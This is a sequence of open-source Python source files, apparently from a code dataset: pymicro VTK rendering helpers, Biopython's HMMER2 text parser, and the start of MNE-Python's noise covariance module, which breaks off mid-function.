cam = vtk.vtkCamera()
cam.SetViewUp(0, 0, 1)
cam.SetPosition(size[0], -size[1], 200)
cam.SetFocalPoint(size[0] / 2, size[1] / 2, size[2] / 2)
cam.Dolly(0.6)
cam.SetClippingRange(0, 1000)
# add axes actor
l = 0.5 * np.mean(size)
axes = axes_actor(length=l, axisLabels=True)
# Create renderer
ren = vtk.vtkRenderer()
ren.SetBackground(1.0, 1.0, 1.0)
ren.AddActor(actor)
# ren.AddActor(outline)
ren.AddViewProp(axes)
ren.SetActiveCamera(cam)
# Create a window for the renderer
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetSize(600, 600)
# Start the initialization and rendering
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
renWin.Render()
iren.Initialize()
iren.Start()
print('done')
def vol_view(scan):
# TODO change from scan name to numpy array
s_size = scan[:-4].split('_')[-2].split('x')
s_type = scan[:-4].split('_')[-1]
size = [int(s_size[0]), int(s_size[1]), int(s_size[2])]
print('reading scan %s with size %dx%dx%d using type %d' %
(scan, size[0], size[1], size[2], to_vtk_type(s_type)))
reader = vtk.vtkImageReader2() # 2 is faster
reader.SetDataScalarType(to_vtk_type(s_type))
reader.SetFileDimensionality(3)
reader.SetHeaderSize(0)
reader.SetDataByteOrderToLittleEndian()
reader.FileLowerLeftOn()
reader.SetDataExtent(0, size[0] - 1, 0, size[1] - 1, 0, 100) # size[2]-1)
reader.SetNumberOfScalarComponents(1)
reader.SetDataOrigin(0, 0, 0)
reader.SetFileName(scan)
reader.Update()
data = reader.GetOutput()
# threshold to remove background
print('thresholding to remove background')
thresh = vtk.vtkThreshold()
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
thresh.SetInputData(data)
else:
thresh.SetInput(data)
# configure the threshold before updating the filter
thresh.SetInputArrayToProcess(1, 0, 0, 0, "ImageFile")
thresh.ThresholdByUpper(1.0)
thresh.Update()
# create random lut
lut = rand_cmap(N=2048, first_is_black=True, table_range=(0, 2047))
# create mapper
print('creating actors')
mapper = vtk.vtkDataSetMapper()
mapper.SetLookupTable(lut)
mapper.SetInputConnection(thresh.GetOutputPort())
# mapper.SetInput(data)
mapper.UseLookupTableScalarRangeOn()
mapper.SetScalarModeToUsePointData();
mapper.SetColorModeToMapScalars();
actor = vtk.vtkActor()
actor.SetMapper(mapper)
# set up camera
cam = vtk.vtkCamera()
cam.SetViewUp(0, 0, 1)
cam.SetPosition(400, -400, 300)
cam.SetFocalPoint(size[0], size[1], size[2])
cam.SetClippingRange(20, 1000)
# add axes actor
l = min(size)
axes = axes_actor(length=l, axisLabels=True)
# Create renderer
ren = vtk.vtkRenderer()
ren.SetBackground(1.0, 1.0, 1.0)
ren.AddActor(actor)
# ren.AddActor(outline)
ren.AddViewProp(axes)
ren.SetActiveCamera(cam)
# Create a window for the renderer
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetSize(600, 600)
# Start the initialization and rendering
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
renWin.Render()
iren.Initialize()
iren.Start()
print('done')
def ask_for_map_file(dir, scan_name):
files = {}
i = 0
print('no map file was specified, please choose from the following available files')
for file in os.listdir(dir):
if file.startswith(scan_name + '.'):
i += 1
files[i] = file
print(' * ', file, '[', i, ']')
if i == 0:
sys.exit('no matching map file could be located, exiting...')
r = raw_input('choose a file by entering the corresponding number [1]: ')
if r == '':
return files[1]
else:
try:
ir = int(r)
except ValueError:
sys.exit('not a number, exiting...')
else:
if ir < i + 1:
return files[ir]
else:
sys.exit('wrong entry, exiting...')
| heprom/pymicro | pymicro/view/vtk_utils.py | Python | mit | 103,117 | ["CRYSTAL", "ParaView", "VTK"] | 14ee52c91113f9166485ee646fa647c7d8cd5445ac4199933b718ce92a6202f5 |
# Copyright 2012 by Kai Blin.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Bio.SearchIO parser for HMMER 2 text output."""
import re
from Bio._py3k import _as_bytes, _bytes_to_string
from Bio._utils import read_forward
from Bio.Alphabet import generic_protein
from Bio.SearchIO._model import QueryResult, Hit, HSP, HSPFragment
from ._base import _BaseHmmerTextIndexer
__all__ = ['Hmmer2TextParser', 'Hmmer2TextIndexer']
_HSP_ALIGN_LINE = re.compile(r'(\S+):\s+domain (\d+) of (\d+)')
class _HitPlaceholder(object):
def createHit(self, hsp_list):
hit = Hit(hsp_list)
hit.id_ = self.id_
hit.evalue = self.evalue
hit.bitscore = self.bitscore
if self.description:
hit.description = self.description
hit.domain_obs_num = self.domain_obs_num
return hit
class Hmmer2TextParser(object):
"""Iterator for the HMMER 2.0 text output."""
def __init__(self, handle):
self.handle = handle
self.buf = []
self._meta = self.parse_preamble()
def __iter__(self):
for qresult in self.parse_qresult():
qresult.program = self._meta.get('program')
qresult.target = self._meta.get('target')
qresult.version = self._meta.get('version')
yield qresult
def read_next(self, rstrip=True):
"""Return the next non-empty line, trailing whitespace removed"""
if len(self.buf) > 0:
return self.buf.pop()
self.line = self.handle.readline()
while self.line and rstrip and not self.line.strip():
self.line = self.handle.readline()
if self.line:
if rstrip:
self.line = self.line.rstrip()
return self.line
def push_back(self, line):
"""Un-read a line that should not be parsed yet"""
self.buf.append(line)
def parse_key_value(self):
"""Parse key-value pair separated by colon (:)"""
key, value = self.line.split(':', 1)
return key.strip(), value.strip()
def parse_preamble(self):
"""Parse HMMER2 preamble."""
meta = {}
state = "GENERIC"
while self.read_next():
if state == "GENERIC":
if self.line.startswith('hmm'):
meta['program'] = self.line.split('-')[0].strip()
elif self.line.startswith('HMMER is'):
continue
elif self.line.startswith('HMMER'):
meta['version'] = self.line.split()[1]
elif self.line.count('-') == 36:
state = "OPTIONS"
continue
assert state == "OPTIONS"
assert 'program' in meta
if self.line.count('-') == 32:
break
key, value = self.parse_key_value()
if meta['program'] == 'hmmsearch':
if key == 'Sequence database':
meta['target'] = value
continue
elif meta['program'] == 'hmmpfam':
if key == 'HMM file':
meta['target'] = value
continue
meta[key] = value
return meta
def parse_qresult(self):
"""Parse a HMMER2 query block."""
while self.read_next():
if not self.line.startswith('Query'):
return  # PEP 479: do not raise StopIteration inside a generator
_, id_ = self.parse_key_value()
self.qresult = QueryResult(id=id_)
description = None
while self.read_next() and not self.line.startswith('Scores'):
if self.line.startswith('Accession'):
self.qresult.accession = self.parse_key_value()[1]
if self.line.startswith('Description'):
description = self.parse_key_value()[1]
hit_placeholders = self.parse_hits()
if len(hit_placeholders) > 0:
self.parse_hsps(hit_placeholders)
self.parse_hsp_alignments()
while not self.line.startswith('Query'):
self.read_next()
if not self.line:
break
self.buf.append(self.line)
if description is not None:
self.qresult.description = description
yield self.qresult
def parse_hits(self):
"""Parse a HMMER2 hit block, beginning with the hit table."""
hit_placeholders = []
while self.read_next():
if self.line.startswith('Parsed'):
break
if self.line.find('no hits') > -1:
break
if self.line.startswith('Sequence') or \
self.line.startswith('Model') or \
self.line.startswith('-------- '):
continue
fields = self.line.split()
id_ = fields.pop(0)
domain_obs_num = int(fields.pop())
evalue = float(fields.pop())
bitscore = float(fields.pop())
description = ' '.join(fields).strip()
hit = _HitPlaceholder()
hit.id_ = id_
hit.evalue = evalue
hit.bitscore = bitscore
hit.description = description
hit.domain_obs_num = domain_obs_num
hit_placeholders.append(hit)
return hit_placeholders
def parse_hsps(self, hit_placeholders):
"""Parse a HMMER2 hsp block, beginning with the hsp table."""
# HSPs may occur in different order than the hits
# so store Hit objects separately first
unordered_hits = {}
while self.read_next():
if self.line.startswith('Alignments') or \
self.line.startswith('Histogram') or \
self.line == '//':
break
if self.line.startswith('Model') or \
self.line.startswith('Sequence') or \
self.line.startswith('--------'):
continue
id_, domain, seq_f, seq_t, seq_compl, hmm_f, hmm_t, hmm_compl, \
score, evalue = self.line.split()
frag = HSPFragment(id_, self.qresult.id)
frag.alphabet = generic_protein
if self._meta['program'] == 'hmmpfam':
frag.hit_start = int(hmm_f) - 1
frag.hit_end = int(hmm_t)
frag.query_start = int(seq_f) - 1
frag.query_end = int(seq_t)
elif self._meta['program'] == 'hmmsearch':
frag.query_start = int(hmm_f) - 1
frag.query_end = int(hmm_t)
frag.hit_start = int(seq_f) - 1
frag.hit_end = int(seq_t)
hsp = HSP([frag])
hsp.evalue = float(evalue)
hsp.bitscore = float(score)
hsp.domain_index = int(domain.split('/')[0])
if self._meta['program'] == 'hmmpfam':
hsp.hit_endtype = hmm_compl
hsp.query_endtype = seq_compl
elif self._meta['program'] == 'hmmsearch':
hsp.query_endtype = hmm_compl
hsp.hit_endtype = seq_compl
if id_ not in unordered_hits:
placeholder = [p for p in hit_placeholders if p.id_ == id_][0]
hit = placeholder.createHit([hsp])
unordered_hits[id_] = hit
else:
hit = unordered_hits[id_]
hsp.hit_description = hit.description
hit.append(hsp)
# The placeholder list is in the correct order, so use that order for
# the Hit objects in the qresult
for p in hit_placeholders:
self.qresult.append(unordered_hits[p.id_])
def parse_hsp_alignments(self):
"""Parse a HMMER2 HSP alignment block."""
if not self.line.startswith('Alignments'):
return
while self.read_next():
if self.line == '//' or self.line.startswith('Histogram'):
break
match = re.search(_HSP_ALIGN_LINE, self.line)
if match is None:
continue
id_ = match.group(1)
idx = int(match.group(2))
num = int(match.group(3))
hit = self.qresult[id_]
if hit.domain_obs_num != num:
continue
frag = hit[idx - 1][0]
hmmseq = ''
consensus = ''
otherseq = ''
structureseq = ''
pad = 0
while self.read_next() and self.line.startswith(' '):
# if there's structure information, parse that
if self.line[16:18] == 'CS':
structureseq += self.line[19:].strip()
if not self.read_next():
break
# skip the *-> start marker if it exists
if self.line[19] == '*':
seq = self.line[22:]
pad = 3
else:
seq = self.line[19:]
pad = 0
# get rid of the end marker
if seq.endswith('<-*'):
seq = seq[:-3]
hmmseq += seq
line_len = len(seq)
if not self.read_next(rstrip=False):
break
consensus += self.line[19 + pad:19 + pad + line_len]
# If there's no consensus sequence, hmmer2 doesn't
# bother to put spaces here, so add extra padding
extra_padding = len(hmmseq) - len(consensus)
consensus += ' ' * extra_padding
if not self.read_next():
break
otherseq += self.line[19:].split()[0].strip()
self.push_back(self.line)
# add similarity sequence to annotation
frag.aln_annotation['similarity'] = consensus
# if there's structure information, add it to the fragment
if structureseq:
frag.aln_annotation['CS'] = structureseq
if self._meta['program'] == 'hmmpfam':
frag.hit = hmmseq
frag.query = otherseq
else:
frag.hit = otherseq
frag.query = hmmseq
class Hmmer2TextIndexer(_BaseHmmerTextIndexer):
"""Indexer for hmmer2-text format."""
_parser = Hmmer2TextParser
qresult_start = _as_bytes('Query')
# qresult ends for hmmpfam and hmmsearch
# need to anticipate both since hmmsearch has a different query end mark
qresult_end = _as_bytes('//')
def __iter__(self):
handle = self._handle
handle.seek(0)
start_offset = handle.tell()
regex_id = re.compile(_as_bytes(r'Query\s*(?:sequence|HMM)?:\s*(.*)'))
# determine flag for hmmsearch
is_hmmsearch = False
line = read_forward(handle)
if line.startswith(_as_bytes('hmmsearch')):
is_hmmsearch = True
while True:
end_offset = handle.tell()
if line.startswith(self.qresult_start):
regx = re.search(regex_id, line)
qresult_key = regx.group(1).strip()
# qresult start offset is the offset of this line
# (starts with the start mark)
start_offset = end_offset - len(line)
elif line.startswith(self.qresult_end):
yield _bytes_to_string(qresult_key), start_offset, 0
start_offset = end_offset
elif not line:
# HACK: since hmmsearch can only have one query result
if is_hmmsearch:
yield _bytes_to_string(qresult_key), start_offset, 0
break
line = read_forward(handle)
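# Minimal usage sketch: this parser is normally reached through Bio.SearchIO
# using the registered format name 'hmmer2-text' (the file name below is
# hypothetical).
#
#   from Bio import SearchIO
#   for qresult in SearchIO.parse('hmmpfam_output.txt', 'hmmer2-text'):
#       for hit in qresult:
#           print(hit.id, hit.evalue, len(hit))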
# if not used as a module, run the doctest
if __name__ == "__main__":
from Bio._utils import run_doctest
run_doctest()
| zjuchenyuan/BioWeb | Lib/Bio/SearchIO/HmmerIO/hmmer2_text.py | Python | mit | 12,055 | ["Biopython"] | 99da5763519dd548e67e3cc83a4ced8f5efef90cb49a190947cf7c566b6fa989 |
# Authors: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Matti Hamalainen <msh@nmr.mgh.harvard.edu>
# Denis A. Engemann <denis.engemann@gmail.com>
#
# License: BSD (3-clause)
import copy as cp
import os
from math import floor, ceil, log
import itertools as itt
import warnings
import six
from distutils.version import LooseVersion
import numpy as np
from scipy import linalg
from .io.write import start_file, end_file
from .io.proj import (make_projector, _proj_equal, activate_proj,
_has_eeg_average_ref_proj)
from .io import fiff_open
from .io.pick import (pick_types, channel_indices_by_type, pick_channels_cov,
pick_channels, pick_info, _picks_by_type)
from .io.constants import FIFF
from .io.meas_info import read_bad_channels
from .io.proj import _read_proj, _write_proj
from .io.tag import find_tag
from .io.tree import dir_tree_find
from .io.write import (start_block, end_block, write_int, write_name_list,
write_double, write_float_matrix, write_string)
from .defaults import _handle_default
from .epochs import _is_good
from .utils import (check_fname, logger, verbose, estimate_rank,
_compute_row_norms, check_sklearn_version, _time_mask)
from .externals.six.moves import zip
from .externals.six import string_types
def _check_covs_algebra(cov1, cov2):
if cov1.ch_names != cov2.ch_names:
raise ValueError('Both Covariance objects must have the same list of '
'channels.')
projs1 = [str(c) for c in cov1['projs']]
projs2 = [str(c) for c in cov2['projs']]
if projs1 != projs2:
raise ValueError('Both Covariance objects must have the same list of '
'SSP projections.')
def _get_tslice(epochs, tmin, tmax):
"""get the slice."""
tstart, tend = None, None
mask = _time_mask(epochs.times, tmin, tmax)
tstart = np.where(mask)[0][0] if tmin is not None else None
tend = np.where(mask)[0][-1] + 1 if tmax is not None else None
tslice = slice(tstart, tend, None)
return tslice
class Covariance(dict):
"""Noise covariance matrix.
Parameters
----------
fname : string
The name of the raw file.
Attributes
----------
data : array of shape (n_channels, n_channels)
The covariance.
ch_names : list of string
List of channels' names.
nfree : int
Number of degrees of freedom i.e. number of time points used.
"""
def __init__(self, fname):
"""Init of covariance."""
if fname is None:
return
# Reading
fid, tree, _ = fiff_open(fname)
self.update(_read_cov(fid, tree, FIFF.FIFFV_MNE_NOISE_COV))
fid.close()
@property
def data(self):
"""Numpy array of Noise covariance matrix."""
return self['data']
@property
def ch_names(self):
"""Channel names."""
return self['names']
@property
def nfree(self):
"""Number of degrees of freedom."""
return self['nfree']
def save(self, fname):
"""Save covariance matrix in a FIF file.
Parameters
----------
fname : str
Output filename.
"""
check_fname(fname, 'covariance', ('-cov.fif', '-cov.fif.gz'))
fid = start_file(fname)
try:
_write_cov(fid, self)
except Exception as inst:
os.remove(fname)
raise inst
end_file(fid)
def as_diag(self, copy=True):
"""Set covariance to be processed as being diagonal.
Parameters
----------
copy : bool
If True, return a modified copy of the covariance. If False,
the covariance is modified in place.
Returns
-------
cov : dict
The covariance.
Notes
-----
This function allows creation of inverse operators
equivalent to using the old "--diagnoise" mne option.
"""
if self['diag'] is True:
return self.copy() if copy is True else self
if copy is True:
cov = cp.deepcopy(self)
else:
cov = self
cov['diag'] = True
cov['data'] = np.diag(cov['data'])
cov['eig'] = None
cov['eigvec'] = None
return cov
def __repr__(self):
if self.data.ndim == 2:
s = 'size : %s x %s' % self.data.shape
else: # ndim == 1
s = 'diagonal : %s' % self.data.size
s += ", n_samples : %s" % self.nfree
s += ", data : %s" % self.data
return "<Covariance | %s>" % s
def __add__(self, cov):
"""Add Covariance taking into account number of degrees of freedom."""
_check_covs_algebra(self, cov)
this_cov = cp.deepcopy(cov)
this_cov['data'] = (((this_cov['data'] * this_cov['nfree']) +
(self['data'] * self['nfree'])) /
(self['nfree'] + this_cov['nfree']))
this_cov['nfree'] += self['nfree']
this_cov['bads'] = list(set(this_cov['bads']).union(self['bads']))
return this_cov
def __iadd__(self, cov):
"""Add Covariance taking into account number of degrees of freedom."""
_check_covs_algebra(self, cov)
self['data'][:] = (((self['data'] * self['nfree']) +
(cov['data'] * cov['nfree'])) /
(self['nfree'] + cov['nfree']))
self['nfree'] += cov['nfree']
self['bads'] = list(set(self['bads']).union(cov['bads']))
return self
@verbose
def plot(self, info, exclude=[], colorbar=True, proj=False, show_svd=True,
show=True, verbose=None):
"""Plot Covariance data.
Parameters
----------
info: dict
Measurement info.
exclude : list of string | str
List of channels to exclude. If empty do not exclude any channel.
If 'bads', exclude info['bads'].
colorbar : bool
Show colorbar or not.
proj : bool
Apply projections or not.
show_svd : bool
Plot also singular values of the noise covariance for each sensor
type. We show square roots, i.e. standard deviations.
show : bool
Call pyplot.show() at the end or not.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
fig_cov : instance of matplotlib.pyplot.Figure
The covariance plot.
fig_svd : instance of matplotlib.pyplot.Figure | None
The SVD spectra plot of the covariance.
"""
from .viz.misc import plot_cov
return plot_cov(self, info, exclude, colorbar, proj, show_svd, show)
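# A small illustrative sketch (hypothetical file names): covariances can be
# combined with `+`, which pools the data weighted by the degrees of freedom
# (`nfree`) as implemented in `__add__` above.
#
#   cov_run1 = read_cov('run1-cov.fif')
#   cov_run2 = read_cov('run2-cov.fif')
#   cov_pooled = cov_run1 + cov_run2  # nfree adds up, data is nfree-weighted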
###############################################################################
# IO
@verbose
def read_cov(fname, verbose=None):
"""Read a noise covariance from a FIF file.
Parameters
----------
fname : string
The name of file containing the covariance matrix. It should end with
-cov.fif or -cov.fif.gz.
verbose : bool, str, int, or None (default None)
If not None, override default verbose level (see mne.verbose).
Returns
-------
cov : Covariance
The noise covariance matrix.
See Also
--------
write_cov, compute_covariance, compute_raw_data_covariance
"""
check_fname(fname, 'covariance', ('-cov.fif', '-cov.fif.gz'))
return Covariance(fname)
###############################################################################
# Estimate from data
@verbose
def make_ad_hoc_cov(info, verbose=None):
"""Create an ad hoc noise covariance.
Parameters
----------
info : instance of mne.io.meas_info.Info
Measurement info.
verbose : bool, str, int, or None (default None)
If not None, override default verbose level (see mne.verbose).
Returns
-------
cov : instance of Covariance
The ad hoc diagonal noise covariance for the M/EEG data channels.
Notes
-----
.. versionadded:: 0.9.0
"""
info = pick_info(info, pick_types(info, meg=True, eeg=True))
info._check_consistency()
# Standard deviations to be used
grad_std = 5e-13
mag_std = 20e-15
eeg_std = 0.2e-6
logger.info('Using standard noise values '
'(MEG grad : %6.1f fT/cm MEG mag : %6.1f fT EEG : %6.1f uV)'
% (1e13 * grad_std, 1e15 * mag_std, 1e6 * eeg_std))
data = np.zeros(len(info['ch_names']))
for meg, eeg, val in zip(('grad', 'mag', False), (False, False, True),
(grad_std, mag_std, eeg_std)):
data[pick_types(info, meg=meg, eeg=eeg)] = val * val
cov = Covariance(None)
cov.update(kind=FIFF.FIFFV_MNE_NOISE_COV, diag=True, dim=len(data),
names=info['ch_names'], data=data, projs=info['projs'],
bads=info['bads'], nfree=0, eig=None, eigvec=None,
info=info)
return cov
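# Minimal usage sketch (the `raw` object is hypothetical): the ad hoc
# covariance only needs measurement info, not data.
#
#   cov = make_ad_hoc_cov(raw.info)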
def _check_n_samples(n_samples, n_chan):
"""Check to see if there are enough samples for reliable cov calc."""
n_samples_min = 10 * (n_chan + 1) // 2
if n_samples <= 0:
raise ValueError('No samples found to compute the covariance matrix')
if n_samples < n_samples_min:
text = ('Too few samples (required : %d got : %d), covariance '
'estimate may be unreliable' % (n_samples_min, n_samples))
warnings.warn(text)
logger.warning(text)
@verbose
def compute_raw_data_covariance(raw, tmin=None, tmax=None, tstep=0.2,
reject=None, flat=None, picks=None,
verbose=None):
"""Estimate noise covariance matrix from a continuous segment of raw data.
It is typically useful to estimate a noise covariance
from empty room data or time intervals before starting
the stimulation.
Note: To speed up the computation you should consider preloading raw data
by setting preload=True when reading the Raw data.
Parameters
----------
raw : instance of Raw
Raw data
tmin : float | None (default None)
Beginning of time interval in seconds
tmax : float | None (default None)
End of time interval in seconds
tstep : float (default 0.2)
Length of data chunks for artefact rejection in seconds.
reject : dict | None (default None)
Rejection parameters based on peak-to-peak amplitude.
Valid keys are 'grad' | 'mag' | 'eeg' | 'eog' | 'ecg'.
If reject is None then no rejection is done. Example::
reject = dict(grad=4000e-13, # T / m (gradiometers)
mag=4e-12, # T (magnetometers)
eeg=40e-6, # uV (EEG channels)
eog=250e-6 # uV (EOG channels)
)
flat : dict | None (default None)
Rejection parameters based on flatness of signal.
Valid keys are 'grad' | 'mag' | 'eeg' | 'eog' | 'ecg', and values
are floats that set the minimum acceptable peak-to-peak amplitude.
If flat is None then no rejection is done.
picks : array-like of int | None (default None)
Indices of channels to include (if None, all channels
except bad channels are used).
verbose : bool | str | int | None (default None)
If not None, override default verbose level (see mne.verbose).
Returns
-------
cov : instance of Covariance
Noise covariance matrix.
See Also
--------
compute_covariance : Estimate noise covariance matrix from epochs
"""
sfreq = raw.info['sfreq']
# Convert to samples
start = 0 if tmin is None else int(floor(tmin * sfreq))
if tmax is None:
stop = int(raw.last_samp - raw.first_samp)
else:
stop = int(ceil(tmax * sfreq))
step = int(ceil(tstep * raw.info['sfreq']))
# don't exclude any bad channels, inverses expect all channels present
if picks is None:
picks = pick_types(raw.info, meg=True, eeg=True, eog=False,
ref_meg=False, exclude=[])
data = 0
n_samples = 0
mu = 0
info = pick_info(raw.info, picks)
idx_by_type = channel_indices_by_type(info)
# Read data in chunks
for first in range(start, stop, step):
last = first + step
if last >= stop:
last = stop
raw_segment, times = raw[picks, first:last]
if _is_good(raw_segment, info['ch_names'], idx_by_type, reject, flat,
ignore_chs=info['bads']):
mu += raw_segment.sum(axis=1)
data += np.dot(raw_segment, raw_segment.T)
n_samples += raw_segment.shape[1]
else:
logger.info("Artefact detected in [%d, %d]" % (first, last))
_check_n_samples(n_samples, len(picks))
mu /= n_samples
data -= n_samples * mu[:, None] * mu[None, :]
data /= (n_samples - 1.0)
logger.info("Number of samples used : %d" % n_samples)
logger.info('[done]')
cov = Covariance(None)
ch_names = [raw.info['ch_names'][k] for k in picks]
# XXX : do not compute eig and eigvec now (think it's better...)
eig = None
eigvec = None
# Store structure for fif
cov.update(kind=FIFF.FIFFV_MNE_NOISE_COV, diag=False, dim=len(data),
names=ch_names, data=data,
projs=cp.deepcopy(raw.info['projs']),
bads=raw.info['bads'], nfree=n_samples, eig=eig,
eigvec=eigvec)
return cov
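# Minimal usage sketch (hypothetical file names): estimate a noise covariance
# from the first 30 s of an empty-room recording and save it to disk.
#
#   from mne.io import Raw
#   raw = Raw('empty_room_raw.fif', preload=True)
#   cov = compute_raw_data_covariance(raw, tmin=0., tmax=30., tstep=0.2)
#   cov.save('empty_room-cov.fif')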
@verbose
def compute_covariance(epochs, keep_sample_mean=True, tmin=None, tmax=None,
projs=None, method='empirical', method_params=None,
cv=3, scalings=None, n_jobs=1, return_estimators=False,
verbose=None):
"""Estimate noise covariance matrix from epochs.
The noise covariance is typically estimated on pre-stim periods
when the stim onset is defined from events.
If the covariance is computed for multiple event types (events
with different IDs), the following two options can be used and combined.
A) either an Epochs object for each event type is created and
a list of Epochs is passed to this function.
B) an Epochs object is created for multiple events and passed
to this function.
Note: Baseline correction should be used when creating the Epochs.
Otherwise the computed covariance matrix will be inaccurate.
Note: For multiple event types, it is also possible to create a
single Epochs object with events obtained using
merge_events(). However, the resulting covariance matrix
will only be correct if keep_sample_mean is True.
Note: The covariance can be unstable if the number of samples is not
sufficient. In that case it is common to regularize a covariance
estimate. The ``method`` parameter of this function allows
regularizing the covariance in an automated way. It also allows
selecting between different alternative estimation algorithms which
themselves achieve regularization. Details are described in [1].
Parameters
----------
epochs : instance of Epochs, or a list of Epochs objects
The epochs.
keep_sample_mean : bool (default True)
If False, the average response over epochs is computed for
each event type and subtracted during the covariance
computation. This is useful if the evoked response from a
previous stimulus extends into the baseline period of the next.
Note. This option is only implemented for method='empirical'.
tmin : float | None (default None)
Start time for baseline. If None start at first sample.
tmax : float | None (default None)
End time for baseline. If None end at last sample.
projs : list of Projection | None (default None)
List of projectors to use in covariance calculation, or None
to indicate that the projectors from the epochs should be
inherited. If None, then projectors from all epochs must match.
method : str | list | None (default 'empirical')
The method used for covariance estimation. If 'empirical' (default),
the sample covariance will be computed. A list can be passed to run a
set of the different methods.
If 'auto' or a list of methods, the best estimator will be determined
based on log-likelihood and cross-validation on unseen data as
described in ref. [1]. Valid methods are:
'empirical', the empirical or sample covariance,
'diagonal_fixed', a diagonal regularization as in mne.cov.regularize
(see MNE manual), 'ledoit_wolf', the Ledoit-Wolf estimator (see [2]),
'shrunk' like 'ledoit_wolf' with cross-validation for optimal alpha
(see scikit-learn documentation on covariance estimation), 'pca',
probabilistic PCA with low rank
(see [3]), and, 'factor_analysis', Factor Analysis with low rank
(see [4]). If 'auto', expands to::
['shrunk', 'diagonal_fixed', 'empirical', 'factor_analysis']
Note. 'ledoit_wolf' and 'pca' are similar to 'shrunk' and
'factor_analysis', respectively. They are not included to avoid
redundancy. In most cases 'shrunk' and 'factor_analysis' represent
more appropriate default choices.
.. versionadded:: 0.9.0
method_params : dict | None (default None)
Additional parameters to the estimation procedure. Only considered if
method is not None. Keys must correspond to the value(s) of `method`.
If None (default), expands to::
'empirical': {'store_precision': False, 'assume_centered': True},
'diagonal_fixed': {'grad': 0.01, 'mag': 0.01, 'eeg': 0.0,
'store_precision': False,
'assume_centered': True},
'ledoit_wolf': {'store_precision': False, 'assume_centered': True},
'shrunk': {'shrinkage': np.logspace(-4, 0, 30),
'store_precision': False, 'assume_centered': True},
'pca': {'iter_n_components': None},
'factor_analysis': {'iter_n_components': None}
cv : int | sklearn cross_validation object (default 3)
The cross validation method. Defaults to 3, which will
internally trigger a default 3-fold shuffle split.
scalings : dict | None (default None)
Defaults to ``dict(mag=1e15, grad=1e13, eeg=1e6)``.
These defaults will scale magnetometers and gradiometers
at the same unit.
n_jobs : int (default 1)
Number of jobs to run in parallel.
return_estimators : bool (default False)
Whether to return all estimators or the best. Only considered if
method equals 'auto' or is a list of str. Defaults to False
verbose : bool | str | int | None (default None)
If not None, override default verbose level (see mne.verbose).
Returns
-------
cov : instance of Covariance | list
The computed covariance. If method equals 'auto' or is a list of str
and return_estimators equals True, a list of covariance estimators is
returned (sorted by log-likelihood, from high to low, i.e. from best
to worst).
See Also
--------
compute_raw_data_covariance : Estimate noise covariance from raw data
References
----------
[1] Engemann D. and Gramfort A. (2015) Automated model selection in
covariance estimation and spatial whitening of MEG and EEG signals,
vol. 108, 328-342, NeuroImage.
[2] Ledoit, O., Wolf, M., (2004). A well-conditioned estimator for
large-dimensional covariance matrices. Journal of Multivariate
Analysis 88 (2), 365 - 411.
[3] Tipping, M. E., Bishop, C. M., (1999). Probabilistic principal
component analysis. Journal of the Royal Statistical Society: Series
B (Statistical Methodology) 61 (3), 611 - 622.
[4] Barber, D., (2012). Bayesian reasoning and machine learning.
Cambridge University Press., Algorithm 21.1
"""
accepted_methods = ('auto', 'empirical', 'diagonal_fixed', 'ledoit_wolf',
'shrunk', 'pca', 'factor_analysis',)
msg = ('Invalid method ({method}). Accepted values (individually or '
'in a list) are "%s"' % '" or "'.join(accepted_methods + ('None',)))
# scale to natural unit for best stability with MEG/EEG
if isinstance(scalings, dict):
for k, v in scalings.items():
if k not in ('mag', 'grad', 'eeg'):
raise ValueError('The keys in `scalings` must be "mag" or'
'"grad" or "eeg". You gave me: %s' % k)
scalings = _handle_default('scalings', scalings)
_method_params = {
'empirical': {'store_precision': False, 'assume_centered': True},
'diagonal_fixed': {'grad': 0.01, 'mag': 0.01, 'eeg': 0.0,
'store_precision': False, 'assume_centered': True},
'ledoit_wolf': {'store_precision': False, 'assume_centered': True},
'shrunk': {'shrinkage': np.logspace(-4, 0, 30),
'store_precision': False, 'assume_centered': True},
'pca': {'iter_n_components': None},
'factor_analysis': {'iter_n_components': None}
}
if isinstance(method_params, dict):
for key, values in method_params.items():
if key not in _method_params:
raise ValueError('key (%s) must be "%s"' %
(key, '" or "'.join(_method_params)))
_method_params[key].update(method_params[key])
# for multi condition support epochs is required to refer to a list of
# epochs objects
def _unpack_epochs(epochs):
if len(epochs.event_id) > 1:
epochs = [epochs[k] for k in epochs.event_id]
else:
epochs = [epochs]
return epochs
if not isinstance(epochs, list):
epochs = _unpack_epochs(epochs)
else:
epochs = sum([_unpack_epochs(epoch) for epoch in epochs], [])
# check for baseline correction
for epochs_t in epochs:
if epochs_t.baseline is None and epochs_t.info['highpass'] < 0.5:
warnings.warn('Epochs are not baseline corrected, covariance '
'matrix may be inaccurate')
for epoch in epochs:
epoch.info._check_consistency()
bads = epochs[0].info['bads']
if projs is None:
projs = cp.deepcopy(epochs[0].info['projs'])
# make sure Epochs are compatible
for epochs_t in epochs[1:]:
if epochs_t.proj != epochs[0].proj:
raise ValueError('Epochs must agree on the use of projections')
for proj_a, proj_b in zip(epochs_t.info['projs'], projs):
if not _proj_equal(proj_a, proj_b):
raise ValueError('Epochs must have same projectors')
else:
projs = cp.deepcopy(projs)
ch_names = epochs[0].ch_names
# make sure Epochs are compatible
for epochs_t in epochs[1:]:
if epochs_t.info['bads'] != bads:
raise ValueError('Epochs must have same bad channels')
if epochs_t.ch_names != ch_names:
raise ValueError('Epochs must have same channel names')
picks_list = _picks_by_type(epochs[0].info)
picks_meeg = np.concatenate([b for _, b in picks_list])
picks_meeg = np.sort(picks_meeg)
ch_names = [epochs[0].ch_names[k] for k in picks_meeg]
info = epochs[0].info # we will overwrite 'epochs'
if method == 'auto':
method = ['shrunk', 'diagonal_fixed', 'empirical', 'factor_analysis']
if not isinstance(method, (list, tuple)):
method = [method]
ok_sklearn = check_sklearn_version('0.15') is True
if not ok_sklearn and (len(method) != 1 or method[0] != 'empirical'):
raise ValueError('scikit-learn is not installed, `method` must be '
'`empirical`')
if keep_sample_mean is False:
if len(method) != 1 or 'empirical' not in method:
raise ValueError('`keep_sample_mean=False` is only supported '
